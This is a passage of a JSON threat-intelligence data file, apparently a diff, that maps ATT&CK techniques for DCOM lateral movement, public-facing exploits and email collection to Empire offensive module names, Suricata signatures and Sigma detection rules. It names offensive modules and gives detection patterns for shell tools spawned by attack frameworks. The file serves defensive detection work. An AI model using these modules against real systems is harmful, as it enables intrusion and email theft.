traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1175", + "command_list": [ + "powershell/lateral_movement/invoke_dcom" + ], + "commands": [ + { + "command": "powershell/lateral_movement/invoke_dcom", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/lateral_movement/invoke_dcom", + "ATT&CK Technique #1": "T1175", + "ATT&CK Technique #2": "", + "Technique": "Distributed Component Object Model", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/invoke_dcom\": [\"T1175\"]," + }, + { + "Rules": "ET Pro", + "SID": "2027190", + "Signature": "ET NETBIOS DCERPC DCOM ShellExecute - Likely Lateral Movement", + "Verified": "Yes" + }, + { + "Rules": "ET Pro", + "SID": "2027189", + "Signature": "ET NETBIOS DCERPC DCOM ExecuteShellCommand Call - Likely Lateral Movement", + "Verified": "Yes" + }, + { + "Rules": "ET Open", + "SID": "2021616", + "Signature": "ET TROJAN PSEmpire Checkin via POST", + "Verified": "Yes" + } + ], + "queries": [ + { + "product": "Suricata (NSM)", + "query": "ET NETBIOS DCERPC DCOM ShellExecute - Likely Lateral Movement", + "name": "ET Pro Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET NETBIOS DCERPC DCOM ExecuteShellCommand Call - Likely Lateral Movement", + "name": "ET Pro Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET TROJAN PSEmpire Checkin via POST", + "name": "ET Open Rule" + } + ], + "possible_detections": [ + { + "title": "Impacket Lateralization Detection", + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "status": "experimental", + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "references": [ + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py" + ], + "author": "Ecco", + "date": "2019/09/03", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection_other": { + "ParentImage": [ + "*\\wmiprvse.exe", + "*\\mmc.exe", + "*\\explorer.exe", + "*\\services.exe" + ], + "CommandLine": [ + "*cmd.exe* /Q /c * \\\\\\\\127.0.0.1\\\\*&1*" + ] + }, + "selection_atexec": { + "ParentCommandLine": [ + "*svchost.exe -k netsvcs", + "taskeng.exe*" + ], + "CommandLine": [ + "cmd.exe /C *Windows\\\\Temp\\\\*&1" + ] + }, + "condition": "(1 of selection_*)" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1047", + "attack.t1175" + ], + "falsepositives": [ + "pentesters" + ], + "level": "critical" + }, + { + "title": "MMC Spawning Windows Shell", + "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "status": "experimental", + "description": "Detects a Windows command line executable started from MMC.", + "author": "Karneades, Swisscom CSIRT", + "tags": [ + "attack.lateral_movement", + "attack.t1175" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\mmc.exe", + "Image": [ + "*\\cmd.exe", + "*\\powershell.exe", + "*\\wscript.exe", + "*\\cscript.exe", + "*\\sh.exe", + "*\\bash.exe", + "*\\reg.exe", + "*\\regsvr32.exe", + "*\\BITSADMIN*" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "Image", + "ParentCommandLine" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Authentication logs" + ], + [ + "Windows event logs" + ], + [ + "DLL monitoring" + ], + [ + "API monitoring" + ], + [ + "Packet capture" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "Windows event logs" + ], + [ + "API monitoring" + ], + [ + "Packet capture" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [ + "https://securelist.com/muddywater/88059/", NaN + ] + }, + { + "technique_id": "T1190", + "command_list": [ + "powershell/lateral_movement/jenkins_script_console", + "python/exploit/web/jboss_jmx" + ], + "commands": [ + { + "command": "powershell/lateral_movement/jenkins_script_console", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/exploit/web/jboss_jmx", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/lateral_movement/jenkins_script_console", + "ATT&CK Technique #1": "T1190", + "ATT&CK Technique #2": "", + "Technique": "Exploit Public-Facing Application", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/jenkins_script_console\": [\"T1190\"]," + }, + { + "Empire Module": "python/exploit/web/jboss_jmx", + "ATT&CK Technique #1": "T1190", + "ATT&CK Technique #2": "", + "Technique": "Exploit Public-Facing Application", + "Concatenate for Python Dictionary": "\"python/exploit/web/jboss_jmx\": [\"T1190\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Oracle WebLogic Exploit", + "id": "37e8369b-43bb-4bf8-83b6-6dd43bda2000", + "description": "Detects access to a webshell droped into a keytore folder on the WebLogic server", + "author": "Florian Roth", + "date": "2018/07/22", + "status": "experimental", + "references": [ + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2894", + "https://twitter.com/pyn3rd/status/1020620932967223296", + "https://github.com/LandGrey/CVE-2018-2894" + ], + "logsource": { + "category": "webserver" + }, + "detection": { + "selection": { + "c-uri-path": [ + "*/config/keystore/*.js*" + ] + }, + "condition": "selection" + }, + "fields": [ + "c-ip", + "c-dns" + ], + "falsepositives": [ + "Unknown" + ], + "tags": [ + "attack.t1100", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation", + "cve.2018-2894" + ], + "level": "critical" + }, + { + "title": "Potential RDP exploit CVE-2019-0708", + "id": "aaa5b30d-f418-420b-83a0-299cb6024885", + "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", + "references": [ + "https://github.com/zerosum0x0/CVE-2019-0708", + "https://github.com/Ekultek/BlueKeep" + ], + "tags": [ + "attack.initial_access", + "attack.lateral_movement", + "attack.t1210", + "attack.t1190", + "car.2013-07-002" + ], + "status": "experimental", + "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection": { + "EventID": [ + 56, + 50 + ], + "Source": "TermDD" + }, + "condition": "selection" + }, + "falsepositives": [ + "Bad connections or network interruptions" + ], + "level": "high" + }, + [ + "Application logs" + ], + [ + "Packet capture" + ], + [ + "Web logs" + ], + [ + "Web application firewall logs" + ], + [ + "Application logs" + ], + [ + "Packet capture" + ], + [ + "Web logs" + ], + [ + "Web application firewall logs" + ], + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + "http://blogs.cisco.com/security/talos/threat-spotlight-group-72", + "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1114", + "command_list": [ + "powershell/management/mailraider/disable_security", + "powershell/management/mailraider/get_emailitems", + "powershell/management/mailraider/get_subfolders", + "powershell/management/mailraider/mail_search", + "powershell/management/mailraider/search_gal", + "powershell/management/mailraider/send_mail", + "powershell/management/mailraider/view_email", + "python/collection/osx/search_email" + ], + "commands": [ + { + "command": "powershell/management/mailraider/disable_security", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/mailraider/get_emailitems", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/mailraider/get_subfolders", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/mailraider/mail_search", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/mailraider/search_gal", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/mailraider/send_mail", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/mailraider/view_email", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/search_email", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/management/mailraider/disable_security", + "ATT&CK Technique #1": "T1114", + "ATT&CK Technique #2": "", + "Technique": "Email Collection", + "Concatenate for Python Dictionary": "\"powershell/management/mailraider/disable_security\": [\"T1114\"]," + }, + { + "Empire Module": "powershell/management/mailraider/get_emailitems", + "ATT&CK Technique #1": "T1114", + "ATT&CK Technique #2": "", + "Technique": "Email Collection", + "Concatenate for Python Dictionary": "\"powershell/management/mailraider/get_emailitems\": [\"T1114\"]," + }, + { + "Empire Module": "powershell/management/mailraider/get_subfolders", + "ATT&CK Technique #1": "T1114", + "ATT&CK Technique #2": "", + "Technique": "Email Collection", + "Concatenate for Python Dictionary": "\"powershell/management/mailraider/get_subfolders\": [\"T1114\"]," + }, + { + "Empire Module": "powershell/management/mailraider/mail_search", + "ATT&CK Technique #1": "T1114", + "ATT&CK Technique #2": "", + "Technique": "Email Collection", + "Concatenate for Python Dictionary": "\"powershell/management/mailraider/mail_search\": [\"T1114\"]," + }, + { + "Empire Module": "powershell/management/mailraider/search_gal", + "ATT&CK Technique #1": "T1114", + "ATT&CK Technique #2": "", + "Technique": "Email Collection", + "Concatenate for Python Dictionary": "\"powershell/management/mailraider/search_gal\": [\"T1114\"]," + }, + { + "Empire Module": "powershell/management/mailraider/send_mail", + "ATT&CK Technique #1": "T1114", + "ATT&CK Technique #2": "", + "Technique": "Email Collection", + "Concatenate for Python Dictionary": "\"powershell/management/mailraider/send_mail\": [\"T1114\"]," + }, + { + "Empire Module": "powershell/management/mailraider/view_email", + "ATT&CK Technique #1": "T1114", + "ATT&CK Technique #2": "", + "Technique": "Email Collection", + "Concatenate for Python Dictionary": "\"powershell/management/mailraider/view_email\": [\"T1114\"]," + }, + { + "Empire Module": "python/collection/osx/search_email", + "ATT&CK Technique #1": "T1114", + "ATT&CK Technique #2": "", + "Technique": "Email Collection", + "Concatenate for Python Dictionary": "\"python/collection/osx/search_email\": [\"T1114\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Firewall Logs" + ], + [ + "4624", + "Authentication logs" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Firewall Logs" + ], + [ + "4624", + "Authentication logs" + ], + [ + "4663", + "File monitoring" + ], + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted 